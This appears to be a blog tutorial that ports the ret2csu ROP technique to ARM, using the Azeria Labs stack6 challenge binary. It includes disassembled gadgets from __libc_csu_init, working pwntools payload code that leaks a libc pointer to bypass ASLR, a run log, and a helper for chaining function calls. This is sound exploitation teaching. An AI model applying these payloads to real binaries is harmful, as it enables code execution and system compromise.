Introduction

In this post I’ll show you how to port the ret2csu technique on ARM binaries. This technique allows full ASLR bypass using ROP gadgets inside the binary only. We will see that it also turns out to be a very effective technique to easily chain ROP gadgets.

Background

My recent interest in ARM exploitation led me to the Azeria Labs tutorials on ARM assembly and ARM exploitation. They are really great for beginners, teaching the basics of memory corruption vulnerabilities, how to exploit them, how to write ARM shellcode, and the basics of how to exploit Stack and Heap corruptions vulnerabilities. There are also stack overflow challenges to practice with the environment, the tools, and very basic exploitation techniques. The goal of the last challenge, called stack6, is

Get control over PC and execute your shellcode using techniques like ret2libc or ROP

The solution is very straightforward and the tutorials give you everything you need to apply ret2libc (also called ret2zp - return to zero protection - on ARM).
The goal of ret2libc is to reuse libc code to eventually execute

system("/bin/sh\x00");

and get a shell. This generalization of this technique is ROP - Return Oriented Programming. An exercise I did for myself was to exploit the same challenge stack6 with a ROP chain in order to:

  1. call mprotect to set the stack as executable
  2. jump to my shellcode and get a shell.

While practicing with ROP on ARM, I realized that it’s not so straighforward to chain ROP gadgets. This article does a really good job in explaining how to do it, and I regret I didn’t find it before smashing my head and finding it by myself.

So far so good; let me recap what I learned with the tutorials and some exercises I made leveraging my knowledge of x86_64 exploitation:

  • ARM assembly and shellcoding
  • Basic stack overflow exploitation (no protections)
  • ret2libc (or ret2zp) technique (NX protection bypass)
  • very basic ROP exploitation (NX protection bypass)

What if there are more protections? Is ASLR turned on? If yes, is there a way to leak a libc pointer without relying on the program behaviour? Can I use ROP to call functions with more than one parameter?
As a matter of fact it turns out that there is no easy answer to all those questions. At least, I wasn’t able to find answers online.

So I decided to investigate how __libc_csu_init works on Linux and if it’s possible to abuse it as we do on x86_64 binaries.

Before we start

I will not cover the details here, I’m assuming you have a knowledge of advanced stack exploitation techniques on x86_64 and a basic understanding of ARM assembly and its function call convention.

ret2csu

If you get the stack6 executable and disassemble it, you can find the code of __libc_csu_init:

00010584 <__libc_csu_init>:
   10584:       e92d43f8        push    {r3, r4, r5, r6, r7, r8, r9, lr}
   10588:       e1a07000        mov     r7, r0
   1058c:       e59f604c        ldr     r6, [pc, #76]   ; 105e0 <__libc_csu_init+0x5c>
   10590:       e59f504c        ldr     r5, [pc, #76]   ; 105e4 <__libc_csu_init+0x60>
   10594:       e08f6006        add     r6, pc, r6
   10598:       e08f5005        add     r5, pc, r5
   1059c:       e0656006        rsb     r6, r5, r6
   105a0:       e1a08001        mov     r8, r1
   105a4:       e1a09002        mov     r9, r2
   105a8:       ebffff63        bl      1033c <_init>
   105ac:       e1b06146        asrs    r6, r6, #2
   105b0:       08bd83f8        popeq   {r3, r4, r5, r6, r7, r8, r9, pc}
   105b4:       e2455004        sub     r5, r5, #4
   105b8:       e3a04000        mov     r4, #0
   105bc:       e2844001        add     r4, r4, #1
   105c0:       e5b53004        ldr     r3, [r5, #4]!
   105c4:       e1a00007        mov     r0, r7
   105c8:       e1a01008        mov     r1, r8
   105cc:       e1a02009        mov     r2, r9
   105d0:       e12fff33        blx     r3
   105d4:       e1540006        cmp     r4, r6
   105d8:       1afffff7        bne     105bc <__libc_csu_init+0x38>
   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}
   105e0:       0001009c        muleq   r1, ip, r0
   105e4:       00010094        muleq   r1, r4, r0

We can see that there are two interesting gadgets, right? Let’s start analyzing the gadget at 0x105dc:

   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}

This gadget allows us to fill r3,r4,r5,r6,r7,r8,r9 and the pc register. We don’t need any of them if we want to call a function, except for pc.

But there is another gadget at 0x105c4 which, if combined with the previous one, can become pretty interesting

   105c4:       e1a00007        mov     r0, r7
   105c8:       e1a01008        mov     r1, r8
   105cc:       e1a02009        mov     r2, r9
   105d0:       e12fff33        blx     r3

Notice how r7, r8 and r9 are moved into r0, r1 and r2 respectively. Those three registers contain the first three parameters of a function.
The gadget ends by branching (with link and exchange) to the address written inside r3 (which we also control).

By combining these two gadgets we can arbitrarily call a function with up to three parameters:

  1. Fill r0, r1 and r2 with the three parameters
  2. Fill r3 with the address of the function

Let’s see how this works, with the following python code

...
pop_many = p32(0x105dc)
mov_and_blx = p32(0x000105c4)

def ret2csu(r0, r1, r2, call):
	payload = b""
	payload += pop_many
	payload += p32(call)    #r3
	payload += p32(0xAA)    #r4
	payload += p32(0xBB)    #r5
	payload += p32(0xCC)    #r6
	payload += p32(r0)      #r7 -> r0
	payload += p32(r1)      #r8 -> r1
	payload += p32(r2)      #r9 -> r2
	payload += mov_and_blx  #pc
	return payload

EIP_OFFSET = 0xYY

payload = b""
payload += b"A"*EIP_OFFSET
payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])

p.sendline(payload)
p.recvline() 

leak = u32(p.recv(4))
log.success("Leaked: {}".format(hex(leak)))
gbyolo@kalimero: bof [master]× » python exploit_ret2csu.py
[*] '/opt/shared/asm/arm/bof/elf'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000)
    RWX:      Has RWX segments
[+] Connecting to 127.0.0.1 on port 5022: Done
[*] pi@127.0.0.1:
    Distro    Raspbian 10
    OS:       linux
    Arch:     Unknown
    Version:  4.19.50
    ASLR:     Enabled
    Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
[+] Starting remote process b'/home/pi/arm/elf' on 127.0.0.1: pid 447
[+] Leaked: 0xb6e14430

We successfully called write and leaked a libc pointer without relying on the program behaviour itself: whatever the program is, ret2csu will always work.
This enables full ASLR bypass, so a second stage payload would just execute either system or execve, or whatever else you like.

Arbitrary ROP chaining

If you looked carefully at the ROP gadgets we used, you would notice that they can be chained in a circular way thus allowing to arbitrarily chain function calls in a x86_64 ROP like manner.

Let’s call POP_MANY the gadget at 0x105dc and MOV_AND_BLX the gadget at 0x105c4. The ret2csu attack consists in executing firstly POP_MANY and then MOV_AND_BLX.

   105c4:       e1a00007        mov     r0, r7
   105c8:       e1a01008        mov     r1, r8
   105cc:       e1a02009        mov     r2, r9
   105d0:       e12fff33        blx     r3
   105d4:       e1540006        cmp     r4, r6
   105d8:       1afffff7        bne     105bc <__libc_csu_init+0x38>
   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}

The last instruction of MOV_AND_BLX is our function call, invoked with a blx arm instruction which will save the address of the next instruction (i.e. 0x105d4) in the link register (lr) before actually jumping. In this way, when the function returns, the code will jump back to this __libc_csu_init code:

   105d4:       e1540006        cmp     r4, r6
   105d8:       1afffff7        bne     105bc <__libc_csu_init+0x38>
   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}

The registers r4 and r6 are compared, and if they are equal, we go back to POP_MANY, so we can still redirect the execution flow. Can we control r4 and r6 such that they contain the same value after blx r3? Of course! We executed the POP_MANY gadget before in order to fill r0, r1 and r2, but we also filled r4, r5 and r6 with junk values;

The updated ret2csu function is the following:

def ret2csu(r0, r1, r2, call, chain=False):
	payload = b""
	if not chain:
		payload += pop_many
	payload += p32(call)    #r3
	payload += p32(0x0)     #r4
	payload += p32(0x0)     #r5
	payload += p32(0x0)     #r6. Set equal to r4
	payload += p32(r0)      #r7 -> r0
	payload += p32(r1)      #r8 -> r1
	payload += p32(r2)      #r9 -> r2
	payload += mov_and_blx  #pc
	return payload

We can now generate a ROP chain such that

payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])
payload += ret2csu(0, 0, 0, elf.symbols['main'], chain=True)
payload += ret2csu(...)
payload += ret2csu(...)

And thus call as many functions as we want.